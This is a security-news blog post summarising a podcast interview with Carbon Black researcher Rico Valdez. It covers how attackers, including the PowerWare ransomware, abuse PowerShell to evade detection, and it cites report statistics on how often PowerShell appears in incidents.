Talking PowerShell and Stealth Attacks with Carbon Black’s Rico Valdez

Malicious actors are increasingly using legitimate tools such as PowerShell in order to lessen their digital footprint and evade detection, and the use of such ubiquitous and legitimate technology can be a problem for organizations when it comes to defending against those threats.

That’s according to Carbon Black senior security researcher Rico Valdez, who joined us for this week’s Cyber Chat podcast to discuss recent research on PowerShell, including a new report examining more than 1,100 security investigations in 2015.

Windows PowerShell is an automation platform and scripting language that Microsoft describes as “providing a massive set of built-in functionality for taking control of your Windows environments.”

The legitimate use along with the built-in functionality makes it a perfect tool for attackers to exploit.

“It used to be the kind of thing where only really sophisticated adversaries would use it, but it’s gotten to the point now where it’s being incorporated in a lot of commodity malware,” Valdez said. “It’s another way to stay under the radar and try to remain undetected.”

Utilizing PowerShell fits into the overall trend of attackers avoiding dropping a lot of tools onto a system; instead, they utilize what’s already there in order to further their goals.

“Monitoring it can be very tricky,” Valdez said. “I don’t think it’s very well understood even by the larger SOCs (security operations centers). Its one of those things that’s a little bit further down on the list for a lot of these organizations to really dig into.”

How are criminals using PowerShell?

When looking at the data from a variety of Incident Response and MSSP partners, 38% of confirmed cyber incidents used PowerShell. This included all industries and multiple attack campaigns.

PowerShell is used for a variety of malicious purposes, according to Carbon Black’s report.

“It’s quite powerful in that it can pretty much touch any part of the system, and if you’re running it with the right privileges it can pretty much do anything on the system,” Valdez said.

For example, last month a new family of ransomware was discovered dubbed “PowerWare.” PowerWare uses the popular technique of duping users via phishing messages containing a macro-enabled Microsoft Word document. The malicious macros then use PowerShell to further the attack.

Eighty-seven percent of the attacks leveraging PowerShell  were commodity malware attacks such as ransomware, click fraud, fake antivirus, and others. Only 13% were described as “advanced” attacks.

This technique is a good example of how attacks tend to evolve, Valdez said. First they’re discovered by sophisticated actors and used in targeted attacks. Then — if they work well — they become mainstream.

“This is a real risk in your environment and you need to be aware of it, because, again, most people aren’t watching it, monitoring it, anything like that.”

Listen to the full conversation with Carbon Black’s Rico Valdez for more about PowerShell and how organizations can protect themselves.

About the Podcast
A new ransomware was recently discovered dubbed PowerWare, which targets organizations via Microsoft Word and PowerShell, and just last week Carbon Black released a report looking at how PowerShell is being utilized for malicious intent. They wrote in the report that “the discovery of using PowerShell in attacks such as PowerWare is part of a larger, worrisome trend when it comes to PowerShell.”

On today’s Cyber Chat we talk with Carbon Black senior security researcher Rico Valdez about the company’s recent findings and how cybercriminals are increasingly using PowerShell to remain under the radar while targeting organizations.


Author: Jeff Peters

SurfWatch Labs editor and host of SurfWatch Labs Cyber Chat podcast. Focused on using threat intelligence and data visualization in order to bring cybercrime to life and help make organizations safer.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: